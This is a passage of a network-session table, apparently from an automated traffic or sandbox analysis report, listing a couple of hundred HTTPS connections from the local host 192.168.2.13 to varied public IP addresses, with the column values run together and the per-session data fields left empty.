                                                  11770192.168.2.1358032199.165.133.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11771192.168.2.134990045.182.148.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11772192.168.2.134798646.207.3.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11773192.168.2.134727838.29.0.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11774192.168.2.135972261.150.85.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11775192.168.2.134809852.16.232.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11776192.168.2.1344390120.128.179.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11777192.168.2.135596680.184.157.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11778192.168.2.133441886.61.200.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11779192.168.2.1340758185.26.84.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11780192.168.2.1338652111.17.143.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11781192.168.2.133355045.172.59.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11782192.168.2.134147218.207.108.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11783192.168.2.134295854.135.73.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11784192.168.2.134057297.82.179.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11785192.168.2.135737899.94.21.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11786192.168.2.1343216189.69.153.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11787192.168.2.134841654.116.86.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11788192.168.2.134844041.10.225.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11789192.168.2.135166460.119.203.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11790192.168.2.1349636216.141.15.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11791192.168.2.135192467.55.226.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11792192.168.2.1349968156.61.164.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11793192.168.2.1350676144.204.234.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11794192.168.2.134349445.69.125.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11795192.168.2.1348406134.125.175.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11796192.168.2.133704825.32.60.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11797192.168.2.1351778201.7.229.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11798192.168.2.1335712143.230.10.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11799192.168.2.1352026117.41.116.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11800192.168.2.1337940110.43.6.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11801192.168.2.1341872104.224.141.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11802192.168.2.1349402137.175.172.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11803192.168.2.1354796171.173.108.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11804192.168.2.1350656219.4.55.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11805192.168.2.1343696176.137.76.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11806192.168.2.135279669.227.195.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11807192.168.2.1339276180.177.96.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11808192.168.2.1339440153.3.208.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11809192.168.2.1350930171.95.0.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11810192.168.2.1348326113.90.74.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11811192.168.2.134164486.167.230.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11812192.168.2.1353766193.239.139.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11813192.168.2.134320412.93.85.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11814192.168.2.135352836.111.225.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11815192.168.2.1357596208.95.224.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11816192.168.2.1352946142.121.194.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11817192.168.2.1337740151.226.23.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11818192.168.2.136064867.128.37.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11819192.168.2.135196819.201.21.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11820192.168.2.134026441.68.143.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11821192.168.2.133413690.129.81.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11822192.168.2.1352210148.91.156.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11823192.168.2.1333748138.97.16.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11824192.168.2.1347814129.210.51.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11825192.168.2.1337424146.152.239.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11826192.168.2.133508020.56.217.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11827192.168.2.135950036.201.2.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11828192.168.2.136070849.132.185.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11829192.168.2.133323697.39.189.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11830192.168.2.135653035.29.41.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11831192.168.2.1353698209.215.204.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11832192.168.2.135563683.126.49.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11833192.168.2.1338428175.183.25.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11834192.168.2.1360968184.108.2.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11835192.168.2.1350114155.189.155.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11836192.168.2.133859080.137.2.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11837192.168.2.134206864.253.27.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11838192.168.2.134453480.208.194.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11839192.168.2.134099276.95.86.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11840192.168.2.135045074.126.52.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11841192.168.2.134545459.117.234.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11842192.168.2.135357652.10.10.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11843192.168.2.135028253.192.157.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11844192.168.2.1336042162.157.73.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11845192.168.2.134431875.16.12.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11846192.168.2.135460688.245.156.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11847192.168.2.1338706130.110.85.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11848192.168.2.134044471.97.127.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11849192.168.2.134292675.36.179.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11850192.168.2.1337312171.101.26.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11851192.168.2.135553035.106.130.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11852192.168.2.1346326105.212.72.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11853192.168.2.1342952206.144.75.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11854192.168.2.1348550144.215.208.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11855192.168.2.1356098223.104.159.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11856192.168.2.1360658221.162.173.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11857192.168.2.133806870.147.57.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11858192.168.2.13381361.245.176.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11859192.168.2.1336076187.87.26.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11860192.168.2.1333384218.231.249.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11861192.168.2.1343230186.82.146.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11862192.168.2.1341920142.17.135.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11863192.168.2.135236494.241.185.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11864192.168.2.1353960148.212.198.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11865192.168.2.1335640190.206.1.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11866192.168.2.134779657.124.195.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11867192.168.2.135374031.60.145.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11868192.168.2.1335100176.168.119.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11869192.168.2.134499637.180.24.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11870192.168.2.1351410108.181.19.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11871192.168.2.133520441.156.179.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11872192.168.2.13441624.191.216.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11873192.168.2.1343772110.61.127.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11874192.168.2.134491267.133.7.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11875192.168.2.1359860102.110.184.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11876192.168.2.1341008216.176.131.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11877192.168.2.13409628.223.24.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11878192.168.2.134033442.89.101.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11879192.168.2.133797476.180.63.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11880192.168.2.1355576147.135.143.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11881192.168.2.1360890144.228.68.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11882192.168.2.1334512116.115.50.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11883192.168.2.1360834184.236.36.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11884192.168.2.1341078211.62.200.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11885192.168.2.135845224.148.148.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11886192.168.2.1355046109.102.222.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11887192.168.2.1335686141.83.141.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11888192.168.2.1337892182.84.91.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11889192.168.2.1352480153.73.72.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11890192.168.2.1341958159.81.180.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11891192.168.2.1360732122.150.201.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11892192.168.2.134615049.43.207.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11893192.168.2.1340510150.154.251.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11894192.168.2.1347060175.75.41.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11895192.168.2.134618080.187.48.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11896192.168.2.1349640178.214.71.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11897192.168.2.133957291.62.95.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11898192.168.2.1350308141.95.55.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11899192.168.2.134126849.9.234.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11900192.168.2.13391561.144.180.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11901192.168.2.13569882.15.7.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11902192.168.2.1338984167.55.37.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11903192.168.2.1341090145.38.249.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11904192.168.2.1344782223.136.37.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11905192.168.2.1360748140.92.91.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11906192.168.2.135501877.192.239.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11907192.168.2.1349794119.255.175.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11908192.168.2.1350810125.149.67.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11909192.168.2.1334596200.100.7.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11910192.168.2.13400644.225.94.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11911192.168.2.13560224.4.229.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11912192.168.2.1349324188.210.61.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11913192.168.2.135073658.147.142.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11914192.168.2.1342170147.124.208.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11915192.168.2.1357798102.52.157.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11916192.168.2.134994875.11.40.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11917192.168.2.135681634.59.20.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11918192.168.2.134054827.210.248.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11919192.168.2.1345790164.70.171.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11920192.168.2.135382417.81.78.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11921192.168.2.133747825.254.169.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11922192.168.2.1349444174.38.184.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11923192.168.2.134849032.136.138.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11924192.168.2.1348016186.104.33.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11925192.168.2.1351246178.105.61.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11926192.168.2.133700693.220.205.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11927192.168.2.1341622193.141.122.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11928192.168.2.135603482.122.210.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11929192.168.2.133754887.190.60.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11930192.168.2.135080825.9.22.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11931192.168.2.135830276.139.182.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11932192.168.2.133359858.63.27.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11933192.168.2.1339290162.16.184.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11934192.168.2.1358876108.172.220.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11935192.168.2.133766431.14.200.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11936192.168.2.13333305.188.211.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11937192.168.2.1341100154.95.105.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11938192.168.2.134879227.36.104.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11939192.168.2.133971861.194.6.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11940192.168.2.1355666133.135.199.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11941192.168.2.1341828199.82.254.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11942192.168.2.1351698185.102.87.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11943192.168.2.1334818134.43.208.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11944192.168.2.1335958206.73.29.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11945192.168.2.1351680204.58.14.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11946192.168.2.1348500197.183.1.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11947192.168.2.134650678.60.72.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11948192.168.2.1359470200.123.204.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11949192.168.2.133752419.186.108.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11950192.168.2.133390269.85.250.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11951192.168.2.134132896.74.105.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11952192.168.2.1348954158.176.80.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11953192.168.2.135412297.210.37.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11954192.168.2.135034889.112.86.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11955192.168.2.133840053.127.127.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11956192.168.2.134950269.157.146.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11957192.168.2.1351156144.159.76.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11958192.168.2.13548601.69.38.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11959192.168.2.1340138201.78.26.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11960192.168.2.1348694126.192.56.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11961192.168.2.135847450.124.119.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11962192.168.2.1346642181.17.87.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11963192.168.2.1336254141.38.76.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11964192.168.2.133827850.5.2.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11965192.168.2.13600848.20.172.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11966192.168.2.135969840.51.12.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11967192.168.2.1349456212.177.78.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11968192.168.2.1355736165.35.217.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11969192.168.2.135263659.183.190.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11970192.168.2.1358078202.3.20.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11971192.168.2.136036443.139.194.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11972192.168.2.1347262136.244.161.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11973192.168.2.134721081.15.196.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11974192.168.2.134666847.191.253.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11975192.168.2.1341236216.202.32.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11976192.168.2.1347680184.79.112.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11977192.168.2.135966065.207.68.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11978192.168.2.1336692211.228.192.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11979192.168.2.133964447.107.145.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11980192.168.2.1334108181.110.233.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11981192.168.2.1353742217.195.40.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11982192.168.2.1348236118.221.188.25443
                                                  TimestampBytes transferredDirectionData


